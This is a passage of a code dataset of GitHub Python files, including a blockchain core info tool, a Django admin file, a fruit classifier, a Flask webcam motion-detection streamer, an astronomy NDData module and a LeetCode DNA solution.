%s, %d, %s\" % (binascii.b2a_hex(node_id[:4]), ipv4, ipv6, port, domain0))\n else:\n print(\" %s, %s, %s, %d, %s\" % (binascii.b2a_hex(node_id[:4]), ipv4, ipv6, port, domain0))\n\n\ndef argument_parser():\n argparser = argparse.ArgumentParser(description='Configure bbc_core using json conf file.')\n argparser.add_argument('-4', '--ip4address', action='store', default=\"127.0.0.1\", help='bbc_core address (IPv4)')\n argparser.add_argument('-6', '--ip6address', action='store', help='bbc_core address (IPv6)')\n argparser.add_argument('-p', '--port', action='store', default=DEFAULT_CORE_PORT, help='port number of bbc_core')\n argparser.add_argument('-d', '--domain_id', action='store', default=None, help='domain_id HEX string')\n argparser.add_argument('-l', '--neighborlist', action='store_true', default=False,\n help='Get neighbor_list in bbc_core')\n argparser.add_argument('-u', '--userlist', action='store_true', default=False, help='Get user_ist in bbc_core')\n argparser.add_argument('-n', '--my_node_id', action='store_true', default=False, help='Get my node_id')\n argparser.add_argument('--stat', action='store_true', default=False, help='Get statistics of the bbc_core')\n argparser.add_argument('--getconfig', action='store_true', default=False, help='Get config from bbc_core')\n argparser.add_argument('-k', '--node_key', action='store', default=\".bbc1/node_key.pem\",\n help=\"path to node key pem file\")\n return argparser.parse_args()\n\n\nif __name__ == '__main__':\n parsed_args = argument_parser()\n addr = None\n port = None\n\n if parsed_args.ip4address:\n addr = parsed_args.ip4address\n if parsed_args.ip6address:\n addr = parsed_args.ip6address\n port = parsed_args.port\n\n bbcclient = bbc_app.BBcAppClient(host=addr, port=port, multiq=False, loglevel=\"all\")\n if os.path.exists(parsed_args.node_key):\n bbcclient.set_node_key(parsed_args.node_key)\n\n if parsed_args.getconfig:\n 
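# Fetch the raw configuration from the core and pretty-print the decoded JSON.\n        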
bbcclient.get_bbc_config()\n        dat = wait_check_result_msg_type(bbcclient.callback, bbclib.MsgType.RESPONSE_GET_CONFIG)\n        print(\"------ config.json ------\")\n        conf = json.loads(dat[KeyType.bbc_configuration].decode())\n        pprint.pprint(conf, width=80)\n        sys.exit(0)\n\n    if parsed_args.stat or (not parsed_args.my_node_id and not parsed_args.userlist and not parsed_args.neighborlist):\n        bbcclient.get_stats()\n        dat = wait_check_result_msg_type(bbcclient.callback, bbclib.MsgType.RESPONSE_GET_STATS)\n        print(\"------ statistics ------\")\n        pprint.pprint(dat[KeyType.stats], width=80)\n        sys.exit(0)\n\n    if parsed_args.domain_id is None:\n        sys.stderr.write(\"-d option (domain_id) is mandatory\\n\")\n        sys.exit(1)\n    domain_id = bbclib.convert_idstring_to_bytes(parsed_args.domain_id)\n    bbcclient.set_domain_id(domain_id)\n\n    if parsed_args.my_node_id:\n        bbcclient.get_node_id()\n        node_id = bbcclient.callback.synchronize()\n        print(\"Node_id is %s\" % node_id.hex())\n    elif parsed_args.userlist:\n        bbcclient.get_user_list()\n        user_list = bbcclient.callback.synchronize()\n        print(\"------- user_list -------\")\n        for uid in user_list:\n            print(\"User_id: \", uid.hex())\n    elif parsed_args.neighborlist:\n        get_neighborlist(bbcclient)\n\n    sys.exit(0)\n","repo_name":"beyond-blockchain/bbc1","sub_path":"utils/bbc_info.py","file_name":"bbc_info.py","file_ext":"py","file_size_in_byte":4511,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"48"} +{"seq_id":"26355561387","text":"from django.contrib import admin\n\n# Register your models here.\nfrom userprofile.models import Profile\n\n\nclass ProfileAdmin(admin.ModelAdmin):\n    list_display = (\n        \"id\",\n        \"username\",\n        \"email\",\n        \"tel_number\",\n        \"gender\",\n        \"type\",\n        \"balance\",\n        \"nickname\",\n        \"status\",\n        \"version\",\n        \"create_time\",\n        \"modify_time\",\n    )\n\n\nadmin.site.register(Profile, ProfileAdmin)\n","repo_name":"xuping2012/SpareFoodShare","sub_path":"userprofile/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22674358108","text":"\"\"\"\nGregor Wagner\nU4Bsp3.py - \nGregor Wagner, 52005240\n\"\"\"\nimport json\n\nclass Person() :\n    def __init__(self, v_name, l_name, city, post_code) :\n        self.vname = v_name.capitalize()\n        self.nname = l_name.capitalize()\n        self.city = city.capitalize()\n        self.post_code = post_code\n\n    def __str__(self) :\n        return f\"{self.vname} {self.nname}, {self.post_code} {self.city}\"\n\n\ndef getJsonFromFile(file) :\n    try:\n        f = open(file, mode=\"r\", encoding='utf-8')\n        data = f.read()\n        f.close()\n    except FileNotFoundError:\n        print(\"You are probably in the wrong directory\")\n        exit()\n    \n\n    return data\n\ndef checkPeople(people) :\n    # Removing items from a list while iterating over it skips elements,\n    # so collect the valid, unique entries in a new list instead.\n    result = []\n    for p in people :\n        if p.vname == \"\" or p.nname == \"\" or p.city == \"\" or p.post_code == \"\":\n            print(f'EMPTY ATTRIBUTES {p}')\n            continue\n        is_duplicate = any(p.vname == q.vname and p.nname == q.nname and p.city == q.city and p.post_code == q.post_code for q in result)\n        if is_duplicate :\n            print(f\"DUPLICATE {p}\")\n            continue\n        result.append(p)\n\n    return result\n\n\ndef main() :\n    json_data = getJsonFromFile(\"people.json\")\n\n    data = json.loads(json_data)\n    data = data[\"people\"]\n\n    people = []\n    for entry in data :\n        people.append(Person(entry[\"v_name\"], entry[\"l_name\"], entry[\"city\"], entry[\"post code\"]))\n    # print(people[0])\n\n    print(f\"Number of people read in: {len(people)}\")\n    people = checkPeople(people)\n\n    print(f\"\\nFinal number of people: {len(people)}\")\n    for p in people :\n        print(p)\n\nif __name__ == \"__main__\":\n    main()","repo_name":"GregGamer/python_homework","sub_path":"Übungsblatt4/U4Bsp3.py","file_name":"U4Bsp3.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19177013790","text":"from sklearn import tree\n\nTEXTURE_BUMPY = 0\nTEXTURE_SMOOTH = 1\n\nLABEL_APPLE = 0\nLABEL_ORANGE = 1\n\nLABELS = {\n    LABEL_APPLE: 'apple',\n    LABEL_ORANGE: 'orange',\n}\n\n\ndef classify(to_classify):\n    features = [\n        [90, TEXTURE_BUMPY],\n        [140, TEXTURE_SMOOTH],\n        [130, TEXTURE_SMOOTH],\n        [150, TEXTURE_BUMPY],\n        [170, TEXTURE_BUMPY],\n    ]\n    labels = [\n        LABEL_ORANGE,\n        LABEL_APPLE,\n        LABEL_APPLE,\n        LABEL_ORANGE,\n        LABEL_ORANGE\n    ]\n\n    clf = tree.DecisionTreeClassifier()\n    clf = clf.fit(features, labels)\n\n    return clf.predict(to_classify)\n\n\ndef main():\n    to_classify = [\n        [160, TEXTURE_BUMPY],\n        [145, TEXTURE_BUMPY],\n        [120, TEXTURE_SMOOTH],\n        [100, TEXTURE_BUMPY],\n    ]\n\n    decisions = classify(to_classify)\n\n    for decision in decisions:\n        print(\"It's a(n):\", LABELS[decision])\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"jwasham/practice-python","sub_path":"machine-learning/fruit-classify.py","file_name":"fruit-classify.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":1548,"dataset":"github-code","pt":"48"} +{"seq_id":"7658920827","text":"# USAGE\n# python webstreaming.py --ip 0.0.0.0 --port 8000\n\n# import the necessary packages\nfrom pyimagesearch.motion_detection import SingleMotionDetector\nfrom pyimagesearch.keyclipwriter import KeyClipWriter\nfrom imutils.video import VideoStream\nfrom flask import Response, Flask, render_template, url_for, request\nimport threading\nimport argparse\nimport datetime\nimport imutils\nimport time\nimport cv2\nimport smtplib\nimport os\nimport os.path as op\nimport glob\nfrom email.message import EmailMessage\n\n# initialize the output frame and a lock used to ensure thread-safe\n# exchanges of the output frames (useful when multiple browsers/tabs\n# are viewing the stream)\noutputFrame = None\nlock = threading.Lock()\n\n# initialize a flask object\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'cf21ee8a4cee82fa62563445a4c6cdd4'\n\n# initialize the video stream and allow the camera sensor to\n# warmup\n#vs = VideoStream(usePiCamera=1).start()\nvs = VideoStream(src=0)\n\n# initialize last uploaded timestamp and frame motion counter\nlastUploadedEmail = datetime.datetime.now()\nmotionCounter = 0\n\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef home():\n    global vs\n    power = False  # if True, camera is on\n\n    if \"Camera On\" in request.form:\n        power = True\n        vs = VideoStream(src=0).start()\n        time.sleep(2.0)\n    elif \"Camera Off\" in request.form:\n        power = False\n        vs.stop()\n\n    # return the rendered template\n    return render_template(\"home.html\", power=power)\n\n\n@app.route(\"/video_feed\")\ndef video_feed():\n    # return the response generated along with the specific media\n    # type (mime type)\n    return Response(generate(),\n        mimetype=\"multipart/x-mixed-replace; 
boundary=frame\")\n\n\n@app.route(\"/saved_videos\")\ndef saved_videos():\n video_path = \"\"\n if (not(\"/static/videos\" in os.getcwd())):\n video_path = op.abspath('./static/videos')\n os.chdir(video_path)\n\n vid_list = glob.glob('*.mp4')\n vid_list.sort()\n\n return render_template(\"saved_videos.html\", vid_list=vid_list)\n\n\ndef detect_motion(frameCount):\n # grab global references to the video stream, output frame, and\n # lock variables\n global vs, outputFrame, lock\n\n # initialize the motion detector and the total number of frames\n # read thus far\n md = SingleMotionDetector(accumWeight=0.1)\n total = 0\n\n # initialize KeyClipWriter, set counter for frames with no motion detected\n kcw = KeyClipWriter()\n consecFramesNoMotion = 0\n\n # loop over frames from the video stream\n while True:\n timestamp = datetime.datetime.now()\n text = \"Unoccupied\"\n # read the next frame from the video stream, resize it,\n # convert the frame to grayscale, and blur it\n frame = vs.read()\n frame = imutils.resize(frame, width=400)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (7, 7), 0)\n\n # if the total number of frames has reached a sufficient\n # number to construct a reasonable background model, then\n # continue to process the frame\n if total > frameCount:\n # detect motion in the image\n motion = md.detect(gray)\n\n # check to see if motion was found in the frame\n if motion is not None:\n # unpack the tuple and draw the box surrounding the\n # \"motion area\" on the output frame\n (thresh, (minX, minY, maxX, maxY)) = motion\n cv2.rectangle(frame, (minX, minY), (maxX, maxY),\n (0, 0, 255), 2)\n text = \"Occupied\"\n\n # send email to notify user of motion\n # send_email(timestamp)\n\n # motion has occured, so reset frames with no motion counter\n consecFramesNoMotion = 0\n else:\n consecFramesNoMotion += 1\n\n record_video(kcw, frame, motion, consecFramesNoMotion, timestamp)\n\n # grab the current timestamp and draw it on the frame\n cv2.putText(frame, timestamp.strftime(\n \"%A %d %B %Y %I:%M:%S%p\"), (10, frame.shape[0] - 10),\n cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)\n cv2.putText(frame, \"Room Status: {}\".format(text), (10, 20),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\n\n # update the background model and increment the total number\n # of frames read thus far\n md.update(gray)\n total += 1\n\n # acquire the lock, set the output frame, and release the\n # lock\n with lock:\n outputFrame = frame.copy()\n\n\ndef generate():\n # grab global references to the output frame and lock variables\n global outputFrame, lock\n\n # loop over frames from the output stream\n while True:\n # wait until the lock is acquired\n with lock:\n # check if the output frame is available, otherwise skip\n # the iteration of the loop\n if outputFrame is None:\n continue\n\n # encode the frame in JPEG format\n (flag, encodedImage) = cv2.imencode(\".jpg\", outputFrame)\n\n # ensure the frame was successfully encoded\n if not flag:\n continue\n\n # yield the output frame in the byte format\n yield(b'--frame\\r\\n' b'Content-Type: image/jpeg\\r\\n\\r\\n' +\n bytearray(encodedImage) + b'\\r\\n')\n\n\ndef send_email(timestamp):\n global motionCounter, lastUploadedEmail\n\n min_send_seconds = 5\n min_motion_frames = 8\n\n # set usernames for email\n # your email here/os.environ.get()\n email_address = ''\n # your password here/os.environ.get()\n password = ''\n contacts = [email_address]\n\n # prepare email message\n msg = EmailMessage()\n msg['From'] = 
email_address\n msg['To'] = contacts\n msg['Subject'] = 'Motion Detection Alert'\n msg.set_content('Motion detected at ' + str(timestamp))\n\n if (timestamp - lastUploadedEmail).seconds >= min_send_seconds:\n # increment the motion counter\n motionCounter += 1\n # check to see if the number of frames with consistent motion is\n # high enough\n if motionCounter >= min_motion_frames:\n with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp:\n smtp.login(email_address, password)\n smtp.send_message(msg)\n\n # update the last uploaded timestamp and reset the motion\n # counter\n lastUploadedEmail = timestamp\n motionCounter = 0\n\n # otherwise, the room is not occupied\n else:\n motionCounter = 0\n\n\ndef record_video(kcw, frame, motion, consecFramesNoMotion, timestamp):\n bufferSize = 32\n outputPath = './static/videos'\n codec = 'avc1' # record mp4 video\n fps = 20\n\n if motion:\n # if we are not already recording, start recording\n if not kcw.recording:\n timeDetected = timestamp.strftime(\"%Y%m%d-%H%M%S\")\n p = \"{}/{}.mp4\".format(outputPath, timeDetected)\n kcw.start(p, cv2.VideoWriter_fourcc(*codec), fps)\n\n # update the key frame clip buffer\n kcw.update(frame)\n\n # stop recording video when there are enough frames without motion\n if kcw.recording and consecFramesNoMotion >= bufferSize:\n kcw.finish()\n\n\n# check to see if this is the main thread of execution\nif __name__ == '__main__':\n # construct the argument parser and parse command line arguments\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-i\", \"--ip\", type=str, required=True,\n help=\"ip address of the device\")\n ap.add_argument(\"-o\", \"--port\", type=int, required=True,\n help=\"ephemeral port number of the server (1024 to 65535)\")\n ap.add_argument(\"-f\", \"--frame-count\", type=int, default=32,\n help=\"# of frames used to construct the background model\")\n args = vars(ap.parse_args())\n\n # start a thread that will perform motion detection\n t = threading.Thread(target=detect_motion, args=(\n args[\"frame_count\"],))\n t.daemon = True\n t.start()\n\n # start the flask app\n app.run(host=args[\"ip\"], port=args[\"port\"], debug=True,\n threaded=True, use_reloader=True)\n\n# release the video stream pointer\nvs.stop()\n","repo_name":"FranklinWang2001/RaspiStream-and-Flask","sub_path":"webstreaming.py","file_name":"webstreaming.py","file_ext":"py","file_size_in_byte":8395,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"42969536543","text":"\"\"\"\nThis module implements a derivative class based on NDData with some Mixins,\nimplementing windowing and on-the-fly data scaling.\n\"\"\"\n\n\nimport warnings\nfrom copy import deepcopy\nfrom functools import reduce\n\nimport numpy as np\n\nfrom astropy.io.fits import ImageHDU\nfrom astropy.modeling import Model, models\nfrom astropy.nddata import (NDArithmeticMixin, NDData, NDSlicingMixin,\n VarianceUncertainty)\nfrom gwcs.wcs import WCS as gWCS\nfrom .wcs import remove_axis_from_frame\n\nINTEGER_TYPES = (int, np.integer)\n\n__all__ = ['NDAstroData']\n\n\nclass ADVarianceUncertainty(VarianceUncertainty):\n \"\"\"\n Subclass VarianceUncertainty to check for negative values.\n \"\"\"\n @VarianceUncertainty.array.setter\n def array(self, value):\n if value is not None and np.any(value < 0):\n warnings.warn(\"Negative variance values found. 
Setting to zero.\",\n RuntimeWarning)\n value = np.where(value >= 0., value, 0.)\n VarianceUncertainty.array.fset(self, value)\n\n\nclass AstroDataMixin:\n \"\"\"\n A Mixin for ``NDData``-like classes (such as ``Spectrum1D``) to enable\n them to behave similarly to ``AstroData`` objects.\n\n These behaviors are:\n 1. ``mask`` attributes are combined with bitwise, not logical, or,\n since the individual bits are important.\n 2. The WCS must be a ``gwcs.WCS`` object and slicing results in\n the model being modified.\n 3. There is a settable ``variance`` attribute.\n 4. Additional attributes such as OBJMASK can be extracted from\n the .meta['other'] dict\n \"\"\"\n def __getattr__(self, attribute):\n \"\"\"\n Allow access to attributes stored in self.meta['other'], as we do\n with AstroData objects.\n \"\"\"\n if attribute.isupper():\n try:\n return self.meta['other'][attribute]\n except KeyError:\n pass\n raise AttributeError(f\"{self.__class__.__name__!r} object has no \"\n f\"attribute {attribute!r}\")\n\n def _arithmetic(self, operation, operand, propagate_uncertainties=True,\n handle_mask=np.bitwise_or, handle_meta=None,\n uncertainty_correlation=0, compare_wcs='first_found',\n **kwds):\n \"\"\"\n Override the NDData method so that \"bitwise_or\" becomes the default\n operation to combine masks, rather than \"logical_or\"\n \"\"\"\n return super()._arithmetic(\n operation, operand, propagate_uncertainties=propagate_uncertainties,\n handle_mask=handle_mask, handle_meta=handle_meta,\n uncertainty_correlation=uncertainty_correlation,\n compare_wcs=compare_wcs, **kwds)\n\n def _slice_wcs(self, slices):\n \"\"\"\n The ``__call__()`` method of gWCS doesn't appear to conform to the\n APE 14 interface for WCS implementations, and doesn't react to\n slicing properly. 
We override NDSlicing's method to do what we want.\n \"\"\"\n if not isinstance(self.wcs, gWCS):\n return self.wcs\n\n # Sanitize the slices, catching some errors early\n if not isinstance(slices, (tuple, list)):\n slices = (slices,)\n slices = list(slices)\n ndim = len(self.shape)\n if len(slices) > ndim:\n raise ValueError(f\"Too many dimensions specified in slice {slices}\")\n\n if Ellipsis in slices:\n if slices.count(Ellipsis) > 1:\n raise IndexError(\"Only one ellipsis can be specified in a slice\")\n ell_index = slices.index(Ellipsis)\n slices[ell_index:ell_index+1] = [slice(None)] * (ndim - len(slices) + 1)\n slices.extend([slice(None)] * (ndim-len(slices)))\n\n mods = []\n mapped_axes = []\n for i, (slice_, length) in enumerate(zip(slices[::-1], self.shape)):\n model = []\n if isinstance(slice_, slice):\n if slice_.step and slice_.step > 1:\n raise IndexError(\"Cannot slice with a step\")\n if slice_.start:\n start = length + slice_.start if slice_.start < 1 else slice_.start\n if start > 0:\n model.append(models.Shift(start))\n mapped_axes.append(max(mapped_axes)+1 if mapped_axes else 0)\n elif isinstance(slice_, INTEGER_TYPES):\n model.append(models.Const1D(slice_))\n mapped_axes.append(-1)\n else:\n raise IndexError(\"Slice not an integer or range\")\n if model:\n mods.append(reduce(Model.__or__, model))\n else:\n # If the previous model was an Identity, we can hang this\n # one onto that without needing to append a new Identity\n if i > 0 and isinstance(mods[-1], models.Identity):\n mods[-1] = models.Identity(mods[-1].n_inputs + 1)\n else:\n mods.append(models.Identity(1))\n\n slicing_model = reduce(Model.__and__, mods)\n if mapped_axes != list(np.arange(ndim)):\n slicing_model = models.Mapping(\n tuple(max(ax, 0) for ax in mapped_axes)) | slicing_model\n slicing_model.inverse = models.Mapping(\n tuple(ax for ax in mapped_axes if ax != -1), n_inputs=ndim)\n\n if isinstance(slicing_model, models.Identity) and slicing_model.n_inputs == ndim:\n return self.wcs # Unchanged!\n new_wcs = deepcopy(self.wcs)\n input_frame = new_wcs.input_frame\n for axis, mapped_axis in reversed(list(enumerate(mapped_axes))):\n if mapped_axis == -1:\n input_frame = remove_axis_from_frame(input_frame, axis)\n new_wcs.pipeline[0].frame = input_frame\n new_wcs.insert_transform(new_wcs.input_frame, slicing_model, after=True)\n return new_wcs\n\n @property\n def variance(self):\n \"\"\"\n A convenience property to access the contents of ``uncertainty``.\n \"\"\"\n arr = self.uncertainty\n if arr is not None:\n return arr.array\n\n @variance.setter\n def variance(self, value):\n self.uncertainty = (ADVarianceUncertainty(value) if value is not None\n else None)\n\n @property\n def wcs(self):\n return super().wcs\n\n @wcs.setter\n def wcs(self, value):\n if value is not None and not isinstance(value, gWCS):\n raise TypeError(\"wcs value must be None or a gWCS object\")\n self._wcs = value\n\n @property\n def shape(self):\n return self._data.shape\n\n @property\n def size(self):\n return self._data.size\n\n\nclass FakeArray:\n\n def __init__(self, very_faked):\n self.data = very_faked\n self.shape = (100, 100) # Won't matter. 
This is just to fool NDData\n        self.dtype = np.float32  # Same here\n\n    def __getitem__(self, index):\n        # FAKE NEWS!\n        return None\n\n    def __array__(self):\n        return self.data\n\n\nclass NDWindowing:\n\n    def __init__(self, target):\n        self._target = target\n\n    def __getitem__(self, slice):\n        return NDWindowingAstroData(self._target, window=slice)\n\n\nclass NDWindowingAstroData(AstroDataMixin, NDArithmeticMixin, NDSlicingMixin, NDData):\n    \"\"\"\n    Allows \"windowed\" access to some properties of an ``NDAstroData`` instance.\n    In particular, ``data``, ``uncertainty``, ``variance``, and ``mask`` return\n    clipped data.\n    \"\"\"\n    def __init__(self, target, window):\n        self._target = target\n        self._window = window\n\n    def __getattr__(self, attribute):\n        \"\"\"\n        Allow access to attributes stored in self.meta['other'], as we do\n        with AstroData objects.\n        \"\"\"\n        if attribute.isupper():\n            try:\n                return self._target._get_simple(attribute, section=self._window)\n            except KeyError:\n                pass\n        raise AttributeError(f\"{self.__class__.__name__!r} object has no \"\n                             f\"attribute {attribute!r}\")\n\n    @property\n    def unit(self):\n        return self._target.unit\n\n    @property\n    def wcs(self):\n        return self._target._slice_wcs(self._window)\n\n    @property\n    def data(self):\n        return self._target._get_simple('_data', section=self._window)\n\n    @property\n    def uncertainty(self):\n        return self._target._get_uncertainty(section=self._window)\n\n    @property\n    def variance(self):\n        if self.uncertainty is not None:\n            return self.uncertainty.array\n\n    @property\n    def mask(self):\n        return self._target._get_simple('_mask', section=self._window)\n\n\ndef is_lazy(item):\n    return isinstance(item, ImageHDU) or (hasattr(item, 'lazy') and item.lazy)\n\n\nclass NDAstroData(AstroDataMixin, NDArithmeticMixin, NDSlicingMixin, NDData):\n    \"\"\"\n    Implements ``NDData`` with all Mixins, plus some ``AstroData`` specifics.\n\n    This class implements an ``NDData``-like container that supports reading\n    and writing as implemented in the ``astropy.io.registry`` and also slicing\n    (indexing) and simple arithmetic (add, subtract, divide and multiply).\n\n    A very important difference between ``NDAstroData`` and ``NDData`` is that\n    the former attempts to load all its data lazily. There are also some\n    important differences in the interface (eg. ``.data`` lets you reset its\n    contents after initialization).\n\n    Documentation is provided where our class differs.\n\n    See also\n    --------\n    NDData\n    NDArithmeticMixin\n    NDSlicingMixin\n\n    Examples\n    --------\n\n    The mixins allow operations that are not possible with ``NDData`` or\n    ``NDDataBase``, i.e. simple arithmetic::\n\n        >>> from astropy.nddata import StdDevUncertainty\n        >>> import numpy as np\n        >>> data = np.ones((3,3), dtype=float)\n        >>> ndd1 = NDAstroData(data, uncertainty=StdDevUncertainty(data))\n        >>> ndd2 = NDAstroData(data, uncertainty=StdDevUncertainty(data))\n        >>> ndd3 = ndd1.add(ndd2)\n        >>> ndd3.data\n        array([[2., 2., 2.],\n               [2., 2., 2.],\n               [2., 2., 2.]])\n        >>> ndd3.uncertainty.array\n        array([[1.41421356, 1.41421356, 1.41421356],\n               [1.41421356, 1.41421356, 1.41421356],\n               [1.41421356, 1.41421356, 1.41421356]])\n\n    See ``NDArithmeticMixin`` for a complete list of all supported arithmetic\n    operations.\n\n    But also slicing (indexing) is possible::\n\n        >>> ndd4 = ndd3[1,:]\n        >>> ndd4.data\n        array([2., 2., 2.])\n        >>> ndd4.uncertainty.array\n        array([1.41421356, 1.41421356, 1.41421356])\n\n    See ``NDSlicingMixin`` for a description of how slicing works (which\n    attributes are sliced).\n\n    \"\"\"\n    def __init__(self, data, uncertainty=None, mask=None, wcs=None,\n                 meta=None, unit=None, copy=False, window=None, variance=None):\n\n        if variance is not None:\n            if uncertainty is not None:\n                raise ValueError(\"Cannot specify both uncertainty and variance\")\n            uncertainty = ADVarianceUncertainty(variance)\n\n        super().__init__(FakeArray(data) if is_lazy(data) else data,\n                         None if is_lazy(uncertainty) else uncertainty,\n                         mask, wcs, meta, unit, copy)\n\n        if is_lazy(data):\n            self.data = data\n        if is_lazy(uncertainty):\n            self.uncertainty = uncertainty\n\n    def __deepcopy__(self, memo):\n        new = self.__class__(\n            self._data if is_lazy(self._data) else deepcopy(self.data, memo),\n            self._uncertainty if is_lazy(self._uncertainty) else None,\n            self._mask if is_lazy(self._mask) else deepcopy(self.mask, memo),\n            deepcopy(self.wcs, memo), None, self.unit\n        )\n        new.meta = deepcopy(self.meta, memo)\n        # Needed to avoid recursion because of uncertainty's weakref to self\n        if not is_lazy(self._uncertainty):\n            new.variance = deepcopy(self.variance)\n        return new\n\n    @property\n    def window(self):\n        \"\"\"\n        Interface to access a section of the data, using lazy access whenever\n        possible.\n\n        Returns\n        --------\n        An instance of ``NDWindowing``, which provides ``__getitem__``,\n        to allow the use of square brackets when specifying the window.\n        Ultimately, an ``NDWindowingAstrodata`` instance is returned.\n\n        Examples\n        ---------\n\n        >>> ad[0].nddata.window[100:200, 100:200]  # doctest: +SKIP\n        <NDWindowingAstrodata ...>\n\n        \"\"\"\n        return NDWindowing(self)\n\n    def _get_uncertainty(self, section=None):\n        \"\"\"Return the ADVarianceUncertainty object, or a slice of it.\"\"\"\n        if self._uncertainty is not None:\n            if is_lazy(self._uncertainty):\n                if section is None:\n                    self.uncertainty = ADVarianceUncertainty(self._uncertainty.data)\n                    return self.uncertainty\n                else:\n                    return ADVarianceUncertainty(self._uncertainty[section])\n            elif section is not None:\n                return self._uncertainty[section]\n            else:\n                return self._uncertainty\n\n    def _get_simple(self, target, section=None):\n        \"\"\"Only use 'section' for image-like objects that have the same shape\n        as the NDAstroData object; otherwise, return the whole object\"\"\"\n        source = getattr(self, target)\n        if source is not None:\n            if is_lazy(source):\n                if section is None:\n                    ret = np.empty(source.shape, dtype=source.dtype)\n                    ret[:] = source.data\n                    setattr(self, target, ret)\n                else:\n                    ret = source[section]\n                return ret\n            elif hasattr(source, 'shape'):\n                if section is None or source.shape != self.shape:\n                    return np.array(source, copy=False)\n                else:\n                    return np.array(source, copy=False)[section]\n            else:\n                return source\n\n    @property\n    def data(self):\n        
\"\"\"\n        An array representing the raw data stored in this instance.\n        It implements a setter.\n        \"\"\"\n        return self._get_simple('_data')\n\n    @data.setter\n    def data(self, value):\n        if value is None:\n            raise ValueError(\"Cannot have None as the data value for an NDData object\")\n\n        if is_lazy(value):\n            self.meta['header'] = value.header\n        self._data = value\n\n    @property\n    def uncertainty(self):\n        return self._get_uncertainty()\n\n    @uncertainty.setter\n    def uncertainty(self, value):\n        if value is not None and not is_lazy(value):\n            if value._parent_nddata is not None:\n                value = value.__class__(value, copy=False)\n            value.parent_nddata = self\n        self._uncertainty = value\n\n    @property\n    def mask(self):\n        return self._get_simple('_mask')\n\n    @mask.setter\n    def mask(self, value):\n        self._mask = value\n\n    @property\n    def variance(self):\n        \"\"\"\n        A convenience property to access the contents of ``uncertainty``,\n        squared (as the uncertainty data is stored as standard deviation).\n        \"\"\"\n        arr = self._get_uncertainty()\n        if arr is not None:\n            return arr.array\n\n    @variance.setter\n    def variance(self, value):\n        self.uncertainty = (ADVarianceUncertainty(value) if value is not None\n                            else None)\n\n    def set_section(self, section, input):\n        \"\"\"\n        Sets only a section of the data. This method is meant to prevent\n        fragmentation in the Python heap, by reusing the internal structures\n        instead of replacing them with new ones.\n\n        Args\n        -----\n        section : ``slice``\n            The area that will be replaced\n        input : ``NDData``-like instance\n            This object needs to implement at least ``data``, ``uncertainty``,\n            and ``mask``. Their entire contents will replace the data in the\n            area defined by ``section``.\n\n        Examples\n        ---------\n\n        >>> sec = NDData(np.zeros((100,100)))  # doctest: +SKIP\n        >>> ad[0].nddata.set_section((slice(None,100),slice(None,100)), sec)  # doctest: +SKIP\n\n        \"\"\"\n        self.data[section] = input.data\n        if self.uncertainty is not None:\n            self.uncertainty.array[section] = input.uncertainty.array\n        if self.mask is not None:\n            self.mask[section] = input.mask\n\n    def __repr__(self):\n        if is_lazy(self._data):\n            return self.__class__.__name__ + '(Memmapped)'\n        else:\n            return super().__repr__()\n\n    @property\n    def T(self):\n        return self.transpose()\n\n    def transpose(self):\n        unc = self.uncertainty\n        new_wcs = deepcopy(self.wcs)\n        inframe = new_wcs.input_frame\n        new_wcs.insert_transform(inframe, models.Mapping(tuple(reversed(range(inframe.naxes)))), after=True)\n        return self.__class__(\n            self.data.T,\n            uncertainty=None if unc is None else unc.__class__(unc.array.T),\n            mask=None if self.mask is None else self.mask.T, wcs=new_wcs,\n            meta=self.meta, copy=False\n        )\n\n    def _slice(self, item):\n        \"\"\"Additionally slice things like OBJMASK\"\"\"\n        kwargs = super()._slice(item)\n        if 'other' in kwargs['meta']:\n            kwargs['meta'] = deepcopy(self.meta)\n            for k, v in kwargs['meta']['other'].items():\n                if isinstance(v, np.ndarray) and v.shape == self.shape:\n                    kwargs['meta']['other'][k] = v[item]\n        return kwargs\n","repo_name":"GeminiDRSoftware/DRAGONS","sub_path":"astrodata/nddata.py","file_name":"nddata.py","file_ext":"py","file_size_in_byte":17764,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"48"} +{"seq_id":"43021491204","text":"from typing import List\nfrom collections import defaultdict\nclass Solution:\n    def findRepeatedDnaSequences(self, s: str) -> List[str]:\n        visited = defaultdict(int)\n        res = []\n        for i in range(len(s)-9):\n            dna = s[i:i+10]\n            if visited[dna] == 1:\n                
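# a 10-mer seen exactly once before is a repeat: record it; the count bump\n                # below ensures each repeated sequence is appended only once\n                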
